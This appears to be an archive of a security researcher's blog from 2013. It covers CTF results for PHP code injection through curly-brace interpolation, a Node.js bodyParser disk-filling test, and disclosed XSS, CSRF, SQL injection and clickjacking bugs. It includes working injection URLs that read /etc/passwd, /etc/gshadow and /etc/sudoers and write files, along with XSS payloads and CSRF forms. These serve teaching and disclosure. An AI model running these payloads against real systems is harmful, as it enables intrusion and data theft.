Garage4Hackers CTF web level 1 challenge result

December 27, 2013

The Garage4Hackers CTF Level 1 challenge went live on 25 December 2013 at 10:30 PM IST. It saw good participation from across the globe, with some really creative attempts to crack the challenge, and it took some serious judging to filter out the top attempts. We are now done with that, and are pleased to announce the results of our Level 1 challenge!

The challenge was http://54.197.234.66/index.php?wish=hohohoSanta:

Try to execute simple PHP code or pwn the server, and try to update http://54.197.234.66/updateme.txt.

Also,

safemode=on

List of disabled functions:
dl, exec, passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec, parse_ini_file, show_source, url_exec, syslog, pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_exec, pcntl_getpriority, pcntl_setpriority, allow_url_fopen, allow_url_include, stream_select

expose_php = Off
display_errors = Off
track_errors = Off
html_errors = Off

Vulnerability Description:

I would like to give special thanks to David Vieira-Kurz (@secalert) for finding this awesome bug on eBay. This kind of vulnerability was little known until it recently came into the limelight (http://www.secalert.net/2013/12/13/ebay-remote-code-execution/). We decided to base the Level 1 challenge on this vulnerability and tried to emulate the same flaw as in the eBay case. For more details on the vulnerability, check the following blogs.


http://www.secalert.net/2013/12/13/ebay-remote-code-execution/
http://gynvael.coldwind.pl/n/ebay_rce_analysis_wrong_question_mark

Submissions from approximately 400 participants

We saw approximately 400 individual participants looking to grab the prize. Payload attempts ranged from blunt Nessus scans to really cool "insert the coolest attack here" attacks.

We have decided to release the full Apache log generated during the challenge. You can get it by emailing us.

Top submissions are ranked by best payload, and on a first come, first served basis where the payloads are the same.

Top submissions

1. Xelenonz Lp.

http://54.197.234.66/index.php?wish[]=x

http://54.197.234.66/index.php?wish={${phpinfo()}}

http://54.197.234.66/index.php?wish={${highlight_file('./index.php')}}

http://54.197.234.66/index.php?wish={${file_put_contents('updateme.txt','Xelenonz',FILE_APPEND)}};

http://54.197.234.66/index.php?wish={${eval($_GET['code'])}}&code=file_put_contents('updateme.txt','Xelenonz',FILE_APPEND);

http://54.197.234.66/index.php?wish={${print_r(glob("/tmp/*"))}}

http://54.197.234.66/index.php?wish={${print_r(scandir($_GET['dir']))}}&dir=/tmp

2. Pichaya Morimoto(LongCat)

http://54.197.234.66/index.php?wish={${readfile('/tmp/lnz')}}

http://54.197.234.66/index.php?wish={${include('/tmp/lnz')}}

http://54.197.234.66/index.php?wish={${print_r(stat("updateme.txt"))}}

http://54.197.234.66/index.php?wish={${file_put_contents("/tmp/lnz",base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg=="))}}

http://54.197.234.66/index.php?wish=/index.php?wish={${read_file('index.php')}}

3. Mykola Ilin – solarwind [Defcon Ukraine]

http://54.197.234.66/index.php?wish=${include "/proc/cpuinfo"}

http://54.197.234.66/index.php?wish=${include "/etc/passwd"}

http://54.197.234.66/index.php?wish=${var_dump(glob("/proc/self/fd/*"))}

http://54.197.234.66/index.php?wish=${var_dump(glob("/etc/*"))}

http://54.197.234.66/index.php?/index.php?wish=${file_put_contents("updateme.txt","\\nsolarwind\\n",FILE_APPEND)}

4. Pedro [tunelko]

http://54.197.234.66/index.php?wish=${var_dump(base64_decode('PD8gcGhwaW5mbygpOyBkaWUoKTs/Pg=='))}

http://54.197.234.66/index.php?wish=${var_dump(file_get_contents('/etc/sudoers'))}

http://54.197.234.66/index.php?wish=${var_dump(file_get_contents('/etc/gshadow'))}

http://54.197.234.66/index.php?wish=${var_dump(ini_get('disable_functions'))}

http://54.197.234.66/index.php?wish=${file_put_contents("updateme.txt","\nsolarwind\n",FILE_APPEND)}

5. Nishant

54.197.234.66/index.php?wish={${phpinfo()}}

54.197.234.66/index.php?wish={${file_put_contents('updateme.txt','nishant.dp@gmail.com at Thu, 26/12/2013 1:25AM IST')}}

6. Bharadwaj Machiraju

54.197.234.66/index.php?wish={${phpinfo()}}

http://54.197.234.66/index.php?wish=${file_put_contents("updateme.txt", "\ntunnelshade\n", FILE_APPEND)}

7. Rahul Mali

54.197.234.66/index.php?wish={${phpinfo()}}
54.197.234.66/index.php?wish={${fwrite(fopen("updateme.txt","a"),"Rahul%20Mali%20(rahulmali31415@gmail.com)")}}

8. Piyush Pattanayak

54.197.234.66/index.php?wish={${phpinfo()}}

54.197.234.66/index.php?wish=shoes({${file_put_contents('updateme.txt', 'Piyush Pattanayak', FILE_APPEND)}})

————————————————————————-
Note: According to our logs, everyone tried to execute PHP code through the curly-brace syntax. However, the PHP code can also be executed in the following way, by breaking out of the string with the concatenation operator.

http://54.197.234.66/index.php?wish=%22%2bphpinfo%28%29%2b%22
http://54.197.234.66/index.php?wish=".phpinfo()."

————————————————————————-

AND THE WINNERS ARE

Xelenonz Lp. and Solarwind

G4h T-shirt

We Provide Penetration Testing

Interesting Vulnerability in express.bodyParser [Node.js]

December 13, 2013

HTML Code:

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Please login!</title>
</head>
<body>
<div id="contact">
<h1>Send an email</h1>
<form action="http://application.nodejs/authenticate" method="post">
<fieldset>
<label for="username">Username:</label>
<input type="text" id="username" name="username" placeholder="Username" />
<label for="password">Password:</label>
<input type="password" id="password" name="password" autocomplete="off" />
<input type="submit" value="Authenticate" />
</fieldset>
</form>
</div>
</body>
</html>

Node JS code:

var express = require('express');
var app = express();
// Parses every request body, including multipart uploads, before any route runs
app.use(express.bodyParser());
app.post('/authenticate', function(req, res) {
  // Form fields from a POST body arrive in req.body, not req.params (route parameters).
  // authenticate() is defined elsewhere and is not part of this listing.
  authenticate(req.body.username, req.body.password);
});
app.listen(80, function() {
  console.log('Server running...');
});

The information given in the code is very limited and not enough on its own; the code for authenticate would be needed for deeper testing. There is, however, one server-side vulnerability visible here that can lead to a server crash or hang.

Possible vulnerability classification:
1) Filling up the complete /tmp disk space.

Explanation for Vulnerability 1:
First, the above code looks innocent. However, this is a very common type of vulnerability, known to most developers. In the above code we are using express.bodyParser, and that is vulnerable to an attack that creates an unlimited number of files on the server, which can fill up the disk, cause unwanted memory consumption, and possibly hang the server.

Second, app.use(express.bodyParser()) causes tmp files to be written on the server for every POST request. To test the vulnerability, run the vulnerable code above.

Before execution, check the tmp file count.

Step 1:
g4h-root$ ls /tmp | wc -l
1336

Step 2:
$ curl -X POST -F test=@tmp/test.p http://localhost/check
ok

Or

$ wget --post-file=tmp/test.p http://localhost/check
ok

Step 3:
g4h-root$ ls /tmp | wc -l
1337 (the count has increased)

Mitigation of vulnerability 1:
1) This method is deprecated in Express.js; the common mitigation is to delete the tmp files every time the code is executed (that is, after each request has been handled).
2) Avoid using bodyParser, or use the defer option of the multipart middleware.

Check out more details of this vulnerability here: andrewkelley.me/post/do-not-use-bodyparser-with-express-js.html


Nullcon Jailbreak 2013 Challenge

November 29, 2013

For those who don't know what Nullcon Jailbreak is: it is a hermetic place for hackers. In addition, there is no word called "palliate" in the #NULLCON Jailbreak dictionary. My team's target was to complete the hacking challenges and find serious vulnerabilities in applications. Watch Nullcon Jailbreak Episodes 1 and 2; there is something special regarding our BlackFog team, and I hope you will enjoy the episodes.

Nullcon Jailbreak Episode 1:

Nullcon Jailbreak Episode 2:

Nullcon Jailbreak Final Episode 2:

Read more about Nullcon Jailbreak:
http://www.redbull.in/cs/Satellite/en_IN/Article/Hacker-Mania-at-JailBreak-2013-021243337433222

Thank you #Nullcon Jailbreak for such a nice program :p


Reflected XSS on tryPair.com

September 24, 2013

It's a very old XSS finding of mine; I just found it on my HDD. It seems they have shut down their application.

POC:

Response:


Responsible Disclosure: Splitwise Stored XSS

Splitwise is a Providence, RI based company that makes it easy to split bills with friends and family, and yes, I am a Splitwise user. Recently I found a stored XSS in the Splitwise "add amount" module. This can be used to easily steal a friend's cookies, and it was also possible to redirect the page to another page where the victim can be trapped easily.

I reported this bug on Aug 21, 2013 and it was fixed the next day :)

POC:

The following payloads executed successfully:

<script>(sessionStorage[!-1]=alert)(!-1)</script>

"><script>alert(1)</script>

Iframe execution demonstration


Thanks for sending me a T-shirt; some more security bugs are on the way :)



What am I doing?

September 20, 2013

Don't expect anything Sci-Fi. Here is the answer:

Thinking, Knowing, Remembering, Judging, and Problem-solving...


Add new Application & Change User’s Avatar CSRF Vulnerability – X.com

July 19, 2013
The X.com bug bounty runs under the PayPal bug bounty program, and I got paid.
Bug 1: Add new Application:
X.com provides an option to add a new application in the account settings. Because the CSRF token is missing, this attack executes successfully and an unauthorized application is added to the user's account without their involvement.
CSRF Vulnerable URL : https://www.x.com/user/my-account/applications/new

To reproduce this vulnerability I have attached a proof of concept.

Direct Download Link of POC :

https://dl.dropbox.com/u/18007092/x.com%20CSRF%20new%20Application.html

Bug 2: Change User's Avatar
X.com allows the user to change their default avatar.
I found that the CSRF token is missing in the avatar change module; this can be used to forcibly set the user's default avatar.
POC:
<form action="https://www.x.com/user/select_avatar/2" method="GET">
<input type="submit" name="submit">
</form>
Thank you Paypal & X.com for running such a good program – g4h Team.

Blind Sql injection Redbus.in [Responsible Disclosure]

July 4, 2013

Redbus is the largest online bus ticket agent in India. Redbus suffered from a highly critical vulnerability: blind SQL injection.

Vulnerable URL: http://www.redbus.in/Feedback/Thankyou.aspx?injectionVar=InjectionPayload

User-Agent:  Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Host IP: 175.41.131.205

Web Server: Microsoft-IIS/7.0

Powered-by: ASP.NET

Using this exploit I was able to access DB information such as tables and columns. Sorry readers, this time I cannot post the complete details of the POC or the vulnerability.

Redbus message

Thank you Redbus for fixing this bug. I use Redbus for ticketing, so I feel Redbus must be more secure 😉

Special thanks to Garage4hackers Team

– [S]


Change OAuth Target URL & Domain Description [ UI redress attack ]

May 10, 2013

I forgot to blog about another of my Google bugs. Nowadays I am busy with my start-up project! I hope to be back on bug bounties soon and to have some good blog posts out! :)

Changing the OAuth Target URL & Domain Description can be achieved using a clickjacking vulnerability. Clickjacking is commonly known as an OWASP Top 10 vulnerability.

Status: Fixed

OAuth is cool and simple to understand; developers can integrate with Google's OAuth endpoints seamlessly and effortlessly. Google provides a panel to manage the Return URL & Domain Description at the following URL.

Vulnerable URL : https://accounts.google.com/ManageDomain?authsub_msd=anydomain.com

On the page there are two input boxes, "Target URL path prefix:" and "Domain description:", where the user submits the domain and description information.

As shown in the following image:

Change OAuth Domain & Description

POC: <iframe src="https://accounts.google.com/ManageDomain?authsub_msd=anydomain.com" width="600" height="600"></iframe> // Not actual POC

Header Information:

As you can see, the relevant header information is missing from the headers below.

Host: accounts.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
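As an added example (not part of the original post), the check a defender runs on a response before concluding a page can be framed: parse the raw header block and look for X-Frame-Options or a Content-Security-Policy frame-ancestors directive, which is what stops the iframe POC above from loading the page. The header blocks in UNPROTECTED, PROTECTED and CSP_PROTECTED are constructed samples, not Google's real responses.

```javascript
// Parse a raw header block into a lower-cased name -> value map.
// Object.create(null) so header names like "constructor" cannot collide with prototype keys.
function parseHeaders(raw) {
  const headers = Object.create(null);
  for (const line of raw.split(/\r?\n/)) {
    const i = line.indexOf(':');
    if (i < 1) continue; // skips the status line and blank lines
    const name = line.slice(0, i).trim().toLowerCase();
    const value = line.slice(i + 1).trim();
    headers[name] = name in headers ? headers[name] + ', ' + value : value;
  }
  return headers;
}

// Report whether the response lets other sites frame the page.
// A CSP frame-ancestors directive takes precedence over X-Frame-Options when both exist.
function framingCheck(rawHeaders) {
  const h = parseHeaders(rawHeaders);
  const directive = (h['content-security-policy'] || '')
    .split(';').map(s => s.trim()).find(s => s.startsWith('frame-ancestors'));
  if (directive) {
    const sources = directive.split(/\s+/).slice(1);
    // "*" or a bare scheme ("https:") lets any origin frame the page.
    const open = sources.includes('*') || sources.some(s => /^https?:$/.test(s));
    return { framable: open, reason: 'Content-Security-Policy: ' + directive };
  }
  const xfo = (h['x-frame-options'] || '').toUpperCase();
  if (xfo === 'DENY' || xfo === 'SAMEORIGIN') return { framable: false, reason: 'X-Frame-Options: ' + xfo };
  if (xfo) return { framable: true, reason: 'unrecognised X-Frame-Options value: ' + xfo };
  return { framable: true, reason: 'no X-Frame-Options and no frame-ancestors directive' };
}

// Constructed sample responses (not Google's real headers): the first carries
// nothing that stops framing; the other two show the two ways to fix it.
const UNPROTECTED = [
  'HTTP/1.1 200 OK',
  'Content-Type: text/html; charset=UTF-8',
  'Set-Cookie: SID=constructed-value; Secure; HttpOnly',
].join('\r\n');
const PROTECTED = UNPROTECTED + '\r\nX-Frame-Options: SAMEORIGIN';
const CSP_PROTECTED = UNPROTECTED + "\r\nContent-Security-Policy: frame-ancestors 'self'";
```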

Special thanks to Google Security Team & G4H(garage4hackers.com) Team ..


PayPal service Zong: Update Credit Card & Billing Information CSRF

March 12, 2013

Vendor product brief information: Zong aims to bring frictionless mobile payments to the world. Zong processes millions of payments a month in over 40 countries worldwide.

CSRF Vulnerable URL: https://my.zong.com/ZPlusConsumerConsole/linkCC/creditCardLink

CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated (OWASP).

POC:

<form action="https://my.zong.com/ZPlusConsumerConsole/linkCC/creditCardLink" method="post" name="manageCreditCardForm" id="manageCreditCardForm">
<input type="hidden" name="consumer_id" value="10053353027" id="consumer_id">
<input type="hidden" name="is_update" value="false" id="is_update">

<label for="billing_first_name">First name</label>
<input type="text" class="text required" id="billing_first_name" name="billing_first_name" value="sandeep">
<label for="billing_last_name">Last name</label>
<input type="text" class="text required" id="billing_last_name" name="billing_last_name" value="kamble">
<label for="billing_card_type">Card type</label>
<select name="billing_card_type" class="select1" id="billing_card_type">
<option value="Visa">Visa</option>
<option value="MasterCard">MasterCard</option>
<option value="AmericanExpress">American Express</option>
<option value="Discover">Discover</option>
</select>

<label for="billing_card_number">Card number</label>
<input type="text" class="text required" id="billing_card_number" name="billing_card_number" value="442411000016">

<label for="billing_exp_month">Expiration date</label>
<select name="billing_exp_month" class="select2" id="billing_exp_month">
<option value="-1">Month</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
</select>
<select name="billing_exp_year" class="select2" id="billing_exp_year">
<option value="-1">Year</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
<option value="2017">2017</option>
<option value="2018">2018</option>
<option value="2019">2019</option>
<option value="2020">2020</option>
<option value="2021">2021</option>
<option value="2022">2022</option>
<option value="2023">2023</option>
</select>

<label for="billing_cvv">Security code</label>
<input type="text" class="cvv required" id="billing_cvv" maxlength="4" name="billing_cvv" value="">
<button type="submit" id="_eventId_continue" name="_eventId_continue" value="continue" class="enterBtn"><span>Link Card</span></button>
</form>

 

Thanks PP for such a good bounty program, and the PP security team for fixing the bug quickly :)
Special thanks to my G4H team.

–[S]
